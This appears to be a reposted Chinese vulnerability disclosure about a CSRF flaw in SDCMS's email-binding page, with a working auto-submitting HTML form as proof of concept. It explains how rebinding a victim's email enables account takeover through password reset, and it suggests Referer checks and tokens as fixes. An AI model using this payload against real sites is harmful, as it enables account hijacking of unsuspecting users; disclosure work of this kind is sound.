来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] SDCMS邮件绑定csrf可劫持账户1、在SDCMS的邮件绑定处,未作任何防御,导致csrfpoc:htmlbodyform id=xfkxfk name=xfkxfk action=http://localhost/sdcms/user/email.asp?act=checkdb method=POS......
|
SDCMS邮件绑定csrf可劫持账户
1、在SDCMS的邮件绑定处,未作任何防御,导致csrf  poc:
<html> <body> <form id="xfkxfk" name="xfkxfk" action="http://localhost/sdcms/user/email.asp?act=checkdb" method="POST"> <input type="text" name="email" value="88888888@qq.com" /> <input type="submit" value="submit"> </form> <script> document.xfkxfk.submit(); </script> </body> </html>
2、我们在本地打开poc:
 3、然后看看邮箱,成功修改:
 4、由于通过csrf可以绑定任意用户任意邮箱,所以可以通过找回密码,发送密码到我们绑定的邮箱中,从而劫持会员账户。
修复方案:
1、判断请求的referer 2、在url中加上token
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
